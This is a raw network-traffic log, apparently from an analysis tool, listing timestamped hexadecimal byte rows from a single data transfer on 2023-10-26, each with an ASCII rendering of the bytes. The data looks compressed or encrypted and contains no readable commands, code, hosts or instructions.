                                                                              2023-10-26 07:45:59 UTC5295INData Raw: 14 b0 38 2b d0 53 44 54 c4 50 f2 b7 0a 19 75 f8 8d ee 5e a0 7b 41 7c 2d 14 82 a7 90 07 b9 eb 59 44 bc 0b a5 d4 86 01 d1 73 6b d6 69 d9 f4 ea 17 b0 b7 fd a7 b9 64 78 58 f4 34 e0 1f 53 57 cf 0e e1 3b e2 36 4a 66 6a 89 b4 3c eb d7 fc ca b9 fe 11 61 cc 01 c9 53 79 d1 d4 e9 f4 f0 42 6f 45 56 f4 f2 64 0f 0e 0a ab e0 ca c2 0a 30 43 83 3f c5 3f b2 80 3a f9 f0 fc a1 78 1a 0b 05 fb c1 be 57 0e a1 d8 a9 84 42 cb 47 2d 02 af a2 cf 61 cf d7 b4 da 13 bd c9 aa 4a 8b 34 42 f8 77 b2 ee 89 49 7b 6d 78 6d 5d 92 2a 38 0b b3 f7 0e 83 e2 ba 9e 94 fa 59 2a 68 fa 38 55 d3 bb 23 88 d4 6e b4 5b 50 81 aa 77 c6 b9 cb 57 3d be c7 9f b4 a9 8c c1 dc 77 cf d7 f4 c7 ea 4f da c5 cd 56 d2 87 51 78 ad b9 e0 3c 0a 49 04 18 de ea 8d cf 4a e4 0a 59 c5 29 cb 7b 9d 53 13 a7 9f 3c 10 58 e0 4c 7e
                                                                              Data Ascii: 8+SDTPu^{A|-YDskidxX4SW;6Jfj<aSyBoEVd0C??:xWBG-aJ4BwI{mxm]*8Y*h8U#n[PwW=wOVQx<IJY){S<XL~
                                                                              2023-10-26 07:45:59 UTC5311INData Raw: c7 6e ae 6e 42 62 69 f4 ef cf 07 35 0e a8 ea 86 d4 8b b9 d0 12 36 c6 41 8e 4e 8b 78 84 4d e2 3f ca 5e 92 05 53 02 46 63 88 c2 e7 17 0d 79 53 6e 82 be c3 78 3c c7 45 40 ca 22 eb cd b9 7b 83 39 54 01 62 d4 c2 37 c3 d7 67 1f 8b 98 d2 84 43 5f f5 d6 13 11 8a 42 9f f7 f0 c1 ba 78 e7 17 0f 21 66 c0 3e 13 88 c2 e7 31 81 3a fa c7 c6 9b db 1b 44 04 ac b7 08 34 3b 65 46 5d bd 75 17 4c 0d 26 61 66 b6 32 97 e2 8a 05 ed 9a c4 64 f4 82 d4 65 a2 bf db 1f 15 62 99 e8 f8 54 3f 6e 29 dc db 18 e2 d0 ea 88 c1 76 bb 5a c0 58 01 22 87 70 ca dc 94 91 a9 d7 ee ff ff 61 58 08 7d 70 f3 bd 80 47 91 89 c2 f7 f3 8d 40 65 84 92 fb 67 67 7d 8f 98 8c d3 6f 40 f9 07 0d a1 7d 62 4a e0 17 e9 eb 7a 97 a7 16 42 07 27 33 a0 0d e6 e4 57 cb 73 28 b4 04 41 96 fb 34 be 13 ef a4 2a 15 91 85 6b bd
                                                                              Data Ascii: nnBbi56ANxM?^SFcySnx<E@"{9Tb7gC_Bx!f>1:D4;eF]uL&af2debT?n)vZX"paX}pG@egg}o@}bJzB'3Ws(A4*k
                                                                              2023-10-26 07:45:59 UTC5327INData Raw: d4 12 35 d9 6f 3a fb af a6 c1 aa 37 82 da 9e 56 cb b7 31 77 11 f7 6f 4a f4 a2 92 65 9e c4 ea 7e c6 32 d8 10 d9 6f ce 1f ff 7e 34 6f 39 01 eb 77 c9 29 cd 5c 43 90 cb 14 b4 ab aa f7 f8 98 c6 67 51 05 f5 57 cb 0b a9 e5 f7 d4 6b b8 da f5 ca aa fb f5 bd 96 6e bf 68 b8 05 8c bb f7 54 87 0e a4 f0 8e ad ef c4 e1 09 49 cb e5 03 d6 ad c1 fb 2e 19 f9 46 98 a4 f4 cb 68 3f 18 aa b2 0b cc 72 78 1a 66 a4 42 68 ea 4a a4 b4 57 00 63 5a 13 eb 57 1e 87 4a 66 5f 62 d8 a4 95 f2 ca 61 fb a3 b0 fa 49 3a cb 20 53 59 b9 5e 47 42 eb 54 ed 4b 95 ab 18 97 c1 4e 14 62 b1 02 ed 41 6b 95 0b 65 ff 63 55 88 a7 31 9b 34 92 26 fb 21 9a ce 2a c2 ff 00 18 c2 2a a2 0a 81 01 57 4b 75 2e 78 5f e6 4a 32 95 fb ea 70 70 77 46 f1 74 ca 8a ad 04 0c cb 2e e2 61 9b cd f4 66 73 39 57 e2 6a 6d 4c 0c 5c
                                                                              Data Ascii: 5o:7V1woJe~2o~4o9w)\CgQWknhTI.Fh?rxfBhJWcZWJf_baI: SY^GBTKNbAkecU14&!**WKu.x_J2ppwFt.afs9WjmL\
                                                                              2023-10-26 07:45:59 UTC5343INData Raw: 68 54 4a e6 dd 41 96 38 fb 41 0a ea 30 02 7f d8 97 94 ea 34 8a 42 66 78 44 48 6a 29 cd b7 69 d2 17 42 ef 98 7e 72 d6 a8 74 76 ca 57 7c 3a 56 50 e8 b4 aa 45 8f 2a 0b 2f ca f1 0a 14 9c b2 50 ab 16 06 0b d4 5f c7 aa f2 06 7f be 57 61 01 f9 77 99 bf dc 17 b0 eb 7d 0d ce a1 da 51 bf 05 15 e4 b4 89 05 7d ba e2 0b e9 60 fe 2a 55 7c b2 0a 43 86 f8 4a 58 0b a2 06 d2 7f db 2a 71 f8 fb 83 7c 94 2a 97 58 7b d3 39 98 ef 7f d5 d1 72 60 88 14 f4 d1 3b a8 7b e1 28 58 48 a2 98 a5 f4 23 60 28 ec 71 a6 e4 f3 01 06 34 fb c0 f1 37 0b 62 e6 42 06 bc 7f e2 54 83 e3 29 e4 06 70 60 46 42 eb 98 cf 84 11 9b fd ad 7a 58 0f 11 af f7 5f ba 8a 5f 01 00 2e 98 63 d2 0a d1 13 b8 11 54 14 b0 ca 3e 80 7d 9d da 86 42 14 ab 54 59 8a 3c f4 a2 d0 72 04 4e 8b 0d 32 82 2a d8 9a 84 db 2e 94 7c 49
                                                                              Data Ascii: hTJA8A04BfxDHj)iB~rtvW|:VPE*/P_Waw}Q}`*U|CJX*q|*X{9r`;{(XH#`(q47bBT)p`FBzX__.cT>}BTY<rN2*.|I
                                                                              2023-10-26 07:45:59 UTC5359INData Raw: ff 44 8d 54 bb 4d 9a 4c 77 81 8e 38 95 67 a8 4f b1 7f 08 ff 75 05 9a 5d 32 a8 28 d8 bd a1 f9 8f 9f af 4a 80 34 2e 8c 33 fb 79 98 3c 31 87 0a 1f 3c 62 ee 9d b3 9d 07 f8 bc c1 f3 e2 b4 71 2f 88 f3 41 15 34 ab 71 56 90 0d 94 3d 58 74 96 f8 39 f6 5e a2 4f ae cf ea 8e 57 50 1a d8 ff 9c 14 d7 f9 41 2c 4f 8f e2 a8 a2 1f e2 8a 38 0a 56 67 cb ce 41 d8 40 8a 98 8a 98 14 92 15 f1 43 b6 ca 7b ff 34 77 f8 67 f3 fc 39 fb e0 73 a5 d2 61 8a 68 5b 0c 57 e0 02 6f b0 ec 6c 6f fe 38 34 46 a5 c0 c4 62 53 d6 04 00 9c 5c b3 2f 1c 98 b4 99 fa 77 ae 73 0c 41 94 ac 07 4c f0 ac 4d ad b8 da e6 e1 e0 85 c6 b7 f3 75 b0 fd 39 c1 cb fc b4 7c 4a e2 73 82 7b fa 27 bf d7 46 8b 14 bf f0 b3 3b 84 79 f4 f7 61 31 13 49 3f 4c 77 b6 26 35 d9 a1 9a 64 42 58 79 ff d5 4b 5b 58 28 a0 5a 95 02 42 a1
                                                                              Data Ascii: DTMLw8gOu]2(J4.3y<1<bq/A4qV=Xt9^OWPA,O8VgA@C{4wg9sah[Wolo84FbS\/wsALMu9|Js{'F;ya1I?Lw&5dBXyK[X(ZB
                                                                              2023-10-26 07:45:59 UTC5375INData Raw: d9 21 b0 d5 63 82 fa 4f 21 d2 05 5f 9c 62 06 99 dd 48 d1 6c 40 54 9a c7 74 76 a2 0f b4 ec b1 d7 34 48 fb bc bd d6 ae b7 b9 a6 53 3b 34 0c 07 32 88 64 6f 2d 17 20 6b 77 d9 eb 93 ab 7e 59 61 92 64 62 dc 08 f7 62 cb 5f 55 5f d3 98 93 73 2a c1 59 c0 ea b7 f2 81 3b 45 75 62 16 d1 69 79 40 6c c1 a3 2a 2c 47 07 f9 03 6f da 6e 8b 7f 61 b9 d7 b4 7f 0b 9f 81 22 45 a9 9c 80 ff 41 6f 0b 7d 61 b0 61 2b 4c cd 6b d4 6b f4 41 fb d6 8a 90 5d e0 02 64 4e 2c 97 87 74 d3 72 e2 40 f0 a5 a5 4a 78 be 76 ba ac 82 19 a0 57 f2 bb 0b 37 8b 63 c9 37 14 8e 93 5d 69 1a a6 b7 74 52 59 7d d8 7e 42 8d 48 10 6c 85 04 34 74 17 ef 32 cb 77 bb 6a 56 57 7e d7 68 38 12 b2 9e 77 72 04 0b f5 6b 22 00 d2 e3 ad c3 17 e5 77 59 b7 58 fc 2f 1a 1d e2 8a 60 b8 8f 7e 8b 8b 89 b5 77 94 93 d2 84 d4 75 62
                                                                              Data Ascii: !cO!_bHl@Ttv4HS;42do- kw~Yadbb_U_s*Y;Eubiy@l*,Gona"EAo}aa+LkkA]dN,tr@JxvW7c7]itRY}~BHl4t2wjVW~h8wrk"wYX/`~wub
                                                                              2023-10-26 07:45:59 UTC5391INData Raw: f4 8a 83 d8 f4 9c 82 5a 3d be 98 8e 0c bd 7e 72 07 0c 28 72 17 c1 6a 8b 84 64 42 a6 9e e0 2e 78 f9 f2 60 39 0b 16 ab f2 7c c4 a4 b7 b5 58 3d 18 19 01 9d 57 4a 59 0a d4 34 08 ab 70 b9 85 9d 30 47 43 cb 38 75 a3 cd 65 5d 40 2b 38 d4 90 a1 cf 34 05 01 5e d5 fb 0a 7a 40 a0 22 28 ca 81 62 69 0a ad 06 aa ed bf 0f 31 02 be aa 40 80 85 98 72 95 88 b7 d8 74 dc 01 39 14 bb e5 a3 9f 2a 16 5c b4 e2 68 58 41 39 d9 b7 3d 71 8a 93 03 36 8b fc 70 97 0a b9 74 78 c7 77 8b e7 b5 90 d9 a6 8a f7 c1 0d 2b 0f 96 e2 6a 23 11 a5 13 fa 14 c2 4a 9d c6 88 45 29 20 42 ab 94 9d 22 be eb d4 e3 5f 61 d3 e1 aa f7 f7 9e b2 86 34 8e 04 46 f4 4b e1 19 0f a4 0a 42 dc 41 8b 69 f4 99 7c 65 58 ea 13 31 e2 6a d6 51 ab 02 25 58 74 3d 8f 5d c2 0d 13 85 b1 09 0a e7 35 d2 2a 22 4d 97 b6 bb 34 e6 80
                                                                              Data Ascii: Z=~r(rjdB.x`9|X=WJY4p0GC8ue]@+84^z@"(bi1@rt9*\hXA9=q6ptxw+j#JE) B"_a4FKBAi|eX1jQ%Xt=]5*"M4
                                                                              2023-10-26 07:45:59 UTC5407INData Raw: 4a ef ca 64 94 b0 6e b8 5a 07 cb 9f 08 ce 7d d8 94 a9 58 63 58 fa 83 a9 cf 21 0f 22 1b 91 a1 65 c8 41 66 dd 98 7f f4 62 4c 59 3a f8 b9 00 c1 17 f3 1f 7d 79 e8 bb 6b b0 43 03 ab 17 ac 79 a8 2d 87 ae 69 c9 18 3c ab 19 8c 85 9a dd d2 a5 6a aa e9 36 d1 f7 47 22 0b ae b8 9f 71 0c 54 24 46 63 99 42 46 78 b4 d0 06 49 9c 62 10 41 73 73 1b d4 f9 6a f1 1b 65 1c b4 b9 54 a0 2a 38 bb 7b 98 ed 84 02 ab 0d 44 8f ac f1 42 02 b3 ff 40 67 b3 ea 14 92 de 17 33 9a 0e 50 7d 22 c6 ac b6 e0 91 38 7b 99 28 38 a3 a1 d8 df 87 a2 e9 38 0b b5 4a 4a 7b 7c 72 38 6e 9d 13 79 94 a3 3c 3b 62 8c ad 37 b4 fe 32 38 ba e7 4b 94 44 69 c6 4c 8c e2 d8 99 a6 d4 8e 58 21 bf b7 77 56 ab ae bd fb 79 11 c8 e8 eb 62 f9 af e9 5e fe ed d2 9a d0 52 a6 74 1a d4 96 ba 17 90 c2 dc ff 91 7d e8 17 13 4c 8d
                                                                              Data Ascii: JdnZ}XcX!"eAfbLY:}ykCy-i<j6G"qT$FcBFxIbAssjeT*8{DB@g3P}"8{(88JJ{|r8ny<;b728KDiLX!wVyb^Rt}L
                                                                              2023-10-26 07:45:59 UTC5423INData Raw: 97 9d 0a 8f 77 fa ca 09 85 59 aa 59 74 68 08 aa e9 98 de 57 0e 93 02 38 14 02 dd 7c 9d aa 54 3d 54 ef 7f bc b4 62 92 cb ee ae bc a0 2d b2 56 6c 90 02 0c a2 47 dc 6a c5 74 c2 34 81 b6 b3 ed 60 1e c6 fe 6d 32 e2 8a a1 54 91 50 b8 c6 21 14 a3 b4 a3 8c 62 c7 c7 ea 2a a4 df 8a 42 0a 02 31 b8 eb 01 55 25 74 eb 5a a7 e3 81 3d 35 d4 8c 48 98 11 95 59 47 e7 7c 4d cb ef 3b 2f 98 85 1f 0b 3a d4 e8 c9 97 76 82 ca 08 7d 84 ea af 2b 18 eb b8 07 94 72 58 f0 ea 5a 58 b5 ec da f7 34 2a 8e 78 59 a4 3f eb c7 56 3c 2e f4 8a 18 7b e8 65 8c b6 7a 9e 21 ca eb 91 7a 38 88 8c 3e f8 2a 65 4a 44 46 fc bb 8d 43 cf 09 24 14 a1 8c f8 a6 23 eb e9 a7 dd 4a 3b 99 9c 68 d8 8d a0 ca 3b 85 3a ab f2 7d 93 0a 7a 98 7f d1 e7 3f dc aa 28 54 89 42 78 4b 7f ea 57 4a 51 e9 e7 ef fc 0b b8 a3 d2 f9
                                                                              Data Ascii: wYYthW8|T=Tb-VlGjt4`m2TP!b*B1U%tZ=5HYG|M;/:v}+rXZX4*xY?V<.{ez!z8>*eJDFC$#J;h;:}z?(TBxKWJQ
                                                                              2023-10-26 07:45:59 UTC5439INData Raw: 53 22 05 13 73 82 ab 51 06 f3 ea 14 f4 b6 5b 8b 34 1e 47 18 e1 9b 09 73 a5 75 30 98 73 85 66 57 ad 8b 84 58 b4 8b a1 d8 cb 72 b0 9b 5a d2 0a 58 b9 7d 28 6e 00 51 41 2d 62 42 cb d7 96 a7 a0 5d 84 48 57 08 54 a4 61 8b b2 0c 47 38 be 86 42 cd bf 4b eb 44 42 c2 ef db 02 9a 3a a1 b4 e3 a6 f8 09 a1 43 bc 34 52 81 61 b4 e5 b0 d7 56 e6 2a 97 81 82 af 91 b3 21 fb 66 4d d9 bf c9 b4 51 a6 b7 97 a2 ca 96 9f a6 46 22 24 62 77 fb b1 f8 59 58 72 3c 1c 79 94 78 49 7d c6 61 0a ef 63 9f ff 39 ac fc 6a 88 7b c8 0d fc a4 e1 5a 78 a5 2c 84 4a b4 0a 6b 7c eb 7d 37 06 89 2e 8b 94 ea ef 13 e3 b0 96 be 17 6f fa 6a 35 6d e2 31 26 74 55 9e 8a 0e fa 2a ba 06 bc 74 26 f4 ea 48 b0 cb 81 ee 68 d8 f1 96 98 12 99 83 44 34 eb 5c 45 cb 61 f1 24 91 b7 1a 38 a6 53 6e 58 82 82 a4 fc 14 05 cb
                                                                              Data Ascii: S"sQ[4Gsu0sfWXrZX}(nQA-bB]HWTaG8BKDB:C4RaV*!fMQF"$bwYXr<yxI}ac9j{Zx,Jk|}7.oj5m1&tU*t&HhD4\Ea$8SnX
                                                                              2023-10-26 07:45:59 UTC5455INData Raw: 65 1a 8d 2e 64 fa f3 ec 4c 99 ea f8 08 ad 71 59 bb de 05 54 b2 d6 ee 89 6b fd 2e 38 48 e2 f1 28 66 7a 45 5f b4 d5 3b 34 63 78 4b d9 da 89 2a ed 73 02 36 27 36 85 07 4f 50 6e 7a f8 89 58 06 48 78 02 2b 5c 14 ab 6f 30 92 4a ef f1 04 a2 8d a2 a5 e1 1c e3 92 22 d9 08 ab ac 6a 2a fb 66 45 32 f4 bf 2a 9c 80 7e 81 fd e1 73 d7 f9 3d 22 2b 39 84 0d 7a 13 f4 9d 7c ea 91 c5 47 d1 a9 b4 6a 5f 85 c9 44 38 e2 f1 ea c9 0b f7 69 4e 1a d4 2a 40 fa a1 e8 d4 40 a7 cc 5f c0 a1 f0 9a 91 22 df cf 74 91 72 2e 94 58 a6 38 34 49 fe 92 be b1 8a 11 0f ec 0c c7 74 42 63 14 10 b4 0b 0f 1b 4b 2b f0 68 e2 8f 9f d4 c1 01 4c b6 d4 43 b8 54 03 78 d5 b6 b5 6a 58 a4 a1 83 8b 84 05 b8 95 e7 43 97 2c 78 3f 79 39 7f 92 90 f8 62 df ea b7 b3 03 90 ec f4 d0 4e e0 4c 10 02 43 7c 02 cb e7 67 df ea
                                                                              Data Ascii: e.dLqYTk.8H(fzE_;4cxK*s6'6OPnzXHx+\o0J"j*fE2*~s="+9z|Gj_D8iN*@@_"tr.X84ItBcK+hLCTxjXC,x?y9bNLC|g
                                                                              2023-10-26 07:45:59 UTC5471INData Raw: fe b4 0a b8 cb 9c 2c 92 16 a3 3b 98 75 c0 33 d8 b2 29 4e 3e e8 03 4b 19 94 f4 da 28 16 a5 16 f1 1c d7 0b cf fb e1 e7 b7 9c 8f 30 e8 10 c6 7e d8 4e 66 b9 73 0d 0a 5e d6 f4 21 d7 9f 24 43 a3 2f e5 e1 ea 57 48 c6 0e 69 8b f0 f3 67 82 da c6 d8 47 07 b2 ce ce 81 dc df 6d 55 20 78 b4 02 16 9d bd 98 04 5c 86 b9 f1 ee 6a cb fb ac 70 62 74 3a ad 1f 3b 22 54 04 4b 11 14 e5 b6 f7 f9 e1 45 9c b9 2e 92 38 dd a6 66 b9 b4 a3 f7 79 44 d4 8a 20 f4 66 88 99 56 ae 6d 08 34 79 a8 bc a8 33 ab f3 0d 22 56 0e d4 21 7b 6a a5 2e f2 90 a3 53 06 1a 34 17 4d 18 b6 ec 93 3c f4 99 93 b8 d4 a4 28 20 45 64 40 2d 2e a2 87 98 b5 6f 86 d8 aa a9 8a 2f 90 62 ef 3d 5a b7 2c b8 af f5 d0 df f4 2c 05 c5 82 e2 6b b8 b5 cc bd 59 74 27 a6 39 6f ed 4a c5 72 22 0f 23 fb 20 30 d8 30 a2 56 b2 b2 53 d0
                                                                              Data Ascii: ,;u3)N>K(0~Nfs^!$C/WHigGmU x\jpbt:;"TKE.8fyD fVm4y3"V!{j.S4M<( Ed@-.o/b=Z,,kYt'9oJr"# 00VS
                                                                              2023-10-26 07:45:59 UTC5487INData Raw: b3 41 14 ab 34 a3 4a 38 6a 1e ae 5f aa bc 94 33 d4 cf b2 d7 40 c7 72 98 5c e1 be 57 6f 77 4e 94 89 36 4b 5c cb 32 7c ce 74 e0 42 55 9f 6a 8a ac d4 52 67 46 48 c2 ed 1c 4e 3a 44 ec 94 46 16 46 78 ac ea b8 0b 9b c0 f9 94 e9 08 40 54 48 ab 5c 44 41 1e 5c f4 4a 80 d4 14 ed 8b 86 54 85 46 18 b2 6a 71 84 5d 1c eb a5 8f b0 6f c1 34 66 5d 01 b4 80 8d f8 fd 41 01 dc 17 97 1e 58 db 40 cb d7 cc b2 69 54 d5 0e 0b 58 4a 82 3c 2b ac 76 04 8e 56 c8 90 b1 14 ca 2a 9d 5c 62 a4 a9 14 25 6e 0c 80 d4 fa a6 02 c2 46 d8 f1 d6 60 d7 5d ad aa c9 d4 3d 2d d8 6a a2 63 c9 14 c3 77 6f a5 77 8a 36 95 6c 0a 1e d4 86 bb 72 74 97 29 98 42 94 4a 65 d3 87 53 16 97 82 08 e1 55 d0 38 38 62 51 cb b7 53 ed 7b 0f c2 c1 a0 20 2d 22 12 44 54 c2 ce 78 73 01 69 4f 12 a2 63 2a bd c3 ca ce cf a1 0d
                                                                              Data Ascii: A4J8j_3@r\WowN6K\2|tBUjRgFHN:DFFx@TH\DA\JTFjq]o4f]AX@iTXJ<+vV*\b%nF`]=-jcwow6lrt)BJeSU88bQS{ -"DTxsiOc*
                                                                              2023-10-26 07:45:59 UTC5503INData Raw: 18 60 76 7d a5 42 06 45 e1 f5 2a 01 fb 4b 83 63 d1 70 a2 3c 9a c7 4f 38 b4 76 ae ed 12 bb 13 86 5c 86 ca bc c0 0c f9 f7 b8 9b 8a 32 8b e3 ca b1 d0 59 8f 2e 6b d7 28 58 c7 83 6a f9 db 5a cd 78 fe 42 d4 f3 d4 81 6c 38 da bf 6d 88 13 15 76 f8 d6 29 cb 52 70 de 8a bc 87 a4 ae 96 8b 56 7b 1c d4 a6 a3 74 14 d1 36 b8 a4 e5 b2 ff a4 54 5c 13 0d c2 89 96 0d 37 d4 84 74 22 6e 1a 9b e3 cd 28 67 ab 4a 54 14 42 3b 5f 06 4b 4b 58 0d 9b 0b d2 9d d1 ca ab d9 a7 b7 32 50 22 c7 04 02 c2 a5 08 74 12 00 71 f4 a3 a0 37 b2 fb bd f7 8c c9 5b 78 b4 9e 02 48 81 f2 6a 5b 51 cc 96 98 b0 c0 b7 6c 55 87 52 94 34 eb 46 2e 94 e1 80 bc 91 fa b9 09 b4 60 23 56 74 4b 42 48 b4 fd 8a 76 0c 79 91 e2 a3 a1 f2 29 cb 91 bf 28 6d 6d fd a7 9b 22 c5 d7 17 13 6b 78 c5 f2 f7 dd 93 d1 5d f9 d4 8c b3
                                                                              Data Ascii: `v}BE*Kcp<O8v\2Y.k(XjZxBl8mv)RpV{t6T\7t"n(gJTB;_KKX2P"tq7[xHj[QlUR4F.`#VtKBHvy)(mm"kx]
                                                                              2023-10-26 07:45:59 UTC5519INData Raw: 12 3b b7 04 b4 51 0a 58 1b a5 c0 86 fb 50 3d 37 18 17 a8 17 54 9f af 3a bc 7c a8 41 8c 82 f1 a8 d0 96 e8 57 ac 7f c5 25 14 c9 53 5c b5 00 4b b8 2a e2 ca bd f4 74 d3 60 9b e3 d4 69 d9 63 7a a2 40 a2 14 28 d4 c1 a8 63 a4 ac 2a 52 b4 9c f0 89 a1 9a d1 a2 54 f6 12 64 b2 81 e4 53 bb 59 c5 75 c0 a6 ea 70 d7 a1 e9 13 a0 5f c0 86 06 9a ee c5 fe 6d f0 44 b4 59 f1 42 4f 3f b7 b0 b4 3b 0f 38 af 33 aa 7b fd 39 0b 3b 02 3d 97 78 0a 78 ea 8a b6 be 7d db 74 e5 ea 57 48 97 77 ff d5 c9 3a 79 ef 9d 9a c3 29 bb 76 9b 73 a5 cc 27 b4 22 14 c6 51 3a 8b a4 6e 58 63 f8 42 a3 6a b3 32 bc 5b f9 b3 ad 80 e5 7b e5 de b7 69 e7 5f fc 26 a3 14 38 f9 26 21 58 34 ae 50 1c a6 d9 aa 2f b7 81 f3 2a 4c 98 aa 28 47 cd 98 55 fb 32 4c 48 3a c1 0a 78 be 1a 0a 2f 0a c5 2b 63 d0 5f 7f f2 06 eb bf
                                                                              Data Ascii: ;QXP=7T:|AW%S\K*t`icz@(c*RTdSYup_mDYBO?;83{9;=xx}tWHw:y)vs'"Q:nXcBj2[{i_&8&!X4P/*L(GU2LH:x/+c_
                                                                              2023-10-26 07:45:59 UTC5535INData Raw: 14 d7 c1 17 b2 9c 8a 47 a4 41 f0 18 b9 f5 f7 2c 74 22 fe 47 11 74 ea 94 7c 0c 65 10 fd 95 80 0f 5b 22 f8 11 6b 22 01 c8 54 90 40 d1 0e f4 59 86 e0 dd 6a 7d 89 3b cd f6 57 c2 e8 52 c9 ec 4b eb a4 e1 62 b8 b0 f2 b4 38 c4 8b 8c f8 18 e5 21 73 58 04 25 d8 78 dc b7 b7 96 df 6e 38 c3 53 39 98 14 15 7b 05 f4 41 c0 e2 71 cf 85 f9 f4 c2 82 65 1c 02 0c 48 48 c2 58 16 54 a2 b2 81 0f e3 8a 1c 20 02 d9 41 4c 02 0a ac 95 30 ab d8 34 f7 e5 87 94 6d ad db 5f 33 0b 5f 42 22 b0 fe 3e 02 dd 20 9c 0a 2b 7a d5 df fa 31 8a c1 68 18 47 05 c5 96 0d 32 ab 79 79 c0 05 9c 87 74 b1 b7 0f d1 ae 57 64 c1 6a 98 83 7f 40 37 3f 0d 32 78 d9 65 ea 1a 16 10 5c b8 24 8f 6c e0 14 33 25 18 6c bc 92 08 81 9c 45 5c 74 14 6b 97 e4 03 83 2e 6b 04 2b 38 b4 01 51 0d ab a1 71 97 8e c5 aa 0b 9d 03 6b
                                                                              Data Ascii: GA,t"Gt|e["k"T@Yj};WRKb8!sX%xn8S9{AqeHHXT AL04m_3_B"> +z1hG2yytWdj@7?2xe\$l3%lE\tk.k+8Qqk
                                                                              2023-10-26 07:45:59 UTC5551INData Raw: 40 ab a3 e0 4c 42 72 bd 4e 82 65 36 54 92 02 b8 d5 86 44 10 a0 c1 cb a1 84 ad 96 ef 65 ac ce d7 14 96 af e0 34 62 d2 5d cb a9 8b 98 c3 8d 75 2f 34 e3 11 4a 87 ab 46 17 7b c2 f7 37 b9 e5 4a e8 34 8c 5b 34 74 ab f9 97 21 42 0b fd a6 b2 19 98 ad f2 58 b8 7f 83 aa 2a 19 99 2a cd 8a 04 8b 54 c2 41 d8 e7 40 e2 02 73 82 d2 c1 59 b4 81 a2 db b0 87 ad eb 94 2b 95 18 24 d8 d8 37 fb c1 c7 46 72 62 9d eb 28 02 f0 0a d4 91 2a 56 d0 f2 0a 0b a4 0f 13 98 84 19 11 93 34 a2 7c 66 54 b1 42 aa f4 b0 11 d8 16 f5 aa 7b 7e f2 61 28 f0 f0 cf 8d e2 e1 41 38 0f 0b 9b 57 60 42 0d 58 e2 e7 54 3b 14 cc 09 a5 40 e6 4a b8 f3 07 5e 13 09 33 91 50 91 2d 93 98 1a bd 9f d7 74 e2 0e 9b 8d e1 e4 17 13 b4 6f 64 fa cd 78 63 d4 24 0f 46 70 24 eb da 34 82 80 60 18 a2 8f 78 f0 e0 55 09 98 62 b4
                                                                              Data Ascii: @LBrNe6TDe4b]u/4JF{7J4[4t!BX**TA@sY+$7Frb(*V4|fTB{~a(A8W`BXT;@J^3P-todxc$Fp$4`xUb
                                                                              2023-10-26 07:45:59 UTC5567INData Raw: b9 e7 89 a9 13 6b 2c 68 42 f4 5c d8 bc ab 8a 5c 8f 22 c9 e2 18 07 8b 9b 32 c2 9f 26 78 22 6b d8 74 85 74 f8 13 2c a0 6a 8c e2 2d fc 88 ab 4a 88 28 02 e7 e7 b2 b6 3f 25 4b ed 4b 2d 74 22 10 2a 9a fe 3b f8 b4 02 06 ac c1 7a 42 8a 13 2f b0 95 24 02 93 64 9d 78 0f f1 74 d2 22 5e af 06 7c 4c 14 6d 6d ef 28 e2 ef 6e 03 1a eb 7b 94 b2 4d 2e 5c 51 58 78 9f d2 29 38 c4 54 9e 79 87 4d cd 59 ad fb bb 4b f4 61 b0 69 60 a2 f9 b8 c3 0a a0 2e 56 a4 ea 5b 73 03 c6 75 b4 65 56 ed 79 e2 0c 41 34 e2 ae 39 0f 83 9f ec 18 47 b6 77 e2 dd 94 bf 74 46 f2 b7 f4 5b a4 8a 64 62 dd 14 a0 0e 8b 28 7c 8f 49 54 51 ff 4a 78 d4 36 d3 ad b2 75 a0 36 4c 42 eb a4 11 0c 14 a1 a6 7c bd 3b ef 12 06 44 7c 3a 55 9c f4 68 63 28 f4 64 ee 37 16 f2 79 14 10 a2 8a f8 63 91 aa f7 ef d6 32 38 90 c2 7a
                                                                              Data Ascii: k,hB\\"2&x"ktt,j-J(?%KK-t"*;zB/$dxt"^|Lmm(n{M.\QXx)8TyMYKai`.V[sueVyA49GwtF[db(|ITQJx6u6LB|;D|:Uhc(d7yc28z
                                                                              2023-10-26 07:45:59 UTC5583INData Raw: c7 84 63 e1 45 62 d6 68 ca d1 fe a5 f0 85 bd 5c d2 02 79 98 b5 ac 8a 6b 53 82 b8 58 3f a4 ea 15 9e 21 6f 71 7d 23 83 78 f9 68 cd de 5b a2 79 8d 94 82 fe 78 60 75 d1 7c cd ec 59 92 2c 02 b0 dd bc 21 06 7b 74 50 6c f6 7c 7b 4b ee a6 b5 fa 77 19 bb 8f e4 14 d2 fc 8a 0d 3f 95 8b b4 2a 8b 25 34 62 fc f9 0a be e4 1f 94 c2 da f7 0d 92 08 02 0d 69 6d 7c 94 77 89 98 dc 41 74 ee b2 b8 f7 e8 22 22 4b 3b c4 77 eb 2c f0 ed 10 a7 4b 25 eb e8 c5 ac 71 6c 14 4e 9c 73 d4 f3 13 47 6c 62 2a fb dd 76 d2 35 07 c8 6d fa 01 cf f5 1a 67 1c 6b 57 b5 dc 11 f8 c7 61 6a 01 dc ec 71 32 76 2a 2b fd 5c b7 82 ff b6 fe aa 97 0b 6b c3 73 e4 f9 4a ec d4 d8 69 b4 f4 74 e6 00 67 eb c0 79 e8 90 bf 74 6a 3b 0b df 16 22 78 ff 74 7d 91 98 ac e1 b0 e9 99 62 0a 3e e8 c5 b6 19 ef b8 af fc c4 ba dc
                                                                              Data Ascii: cEbh\ykSX?!oq}#xh[yx`u|Y,!{tPl|{Kw?*%4bim|wAt""K;w,K%qlNsGlb*v5mgkWajq2v*+\ksJitgytj;"xt}b>
                                                                              2023-10-26 07:45:59 UTC5599INData Raw: eb 77 5a 58 b8 f0 be 75 4a 05 72 5d ae ca 0a b8 9a dc fa 72 09 3e 08 17 31 c2 95 e8 10 45 f2 3d 13 6f 8d 78 d4 cf 40 0b 1b 81 91 fb 3c 02 f2 e8 d9 2a 6b 78 82 dd bf 9b e8 d5 cb e2 33 be 4b d8 e1 9d 09 0b 24 96 df a5 17 da ea 61 96 80 c2 84 c3 d4 9a fc 48 90 bf 70 54 0e eb 54 6f 60 77 91 f3 ea 8c 0d c3 d2 27 1c 24 ce f9 77 cd 18 8c 2d 25 c7 01 a1 e0 e7 bc a8 74 62 60 ea 55 8c a8 89 1e 82 bd 19 f9 0d 06 45 ee e6 ea 4f 45 f7 aa 52 73 e2 06 38 4c 77 3a 26 ed 62 ae 52 49 84 a4 7a 81 b2 aa 36 ba ca 4f 39 b4 02 30 10 d1 7a 8a 32 88 e2 e9 65 4a f9 5f 6b ce a6 2a 7a 77 c6 3a 37 a4 21 45 f9 ec cf c3 bc 74 5a dd 70 d2 b6 24 65 f4 a2 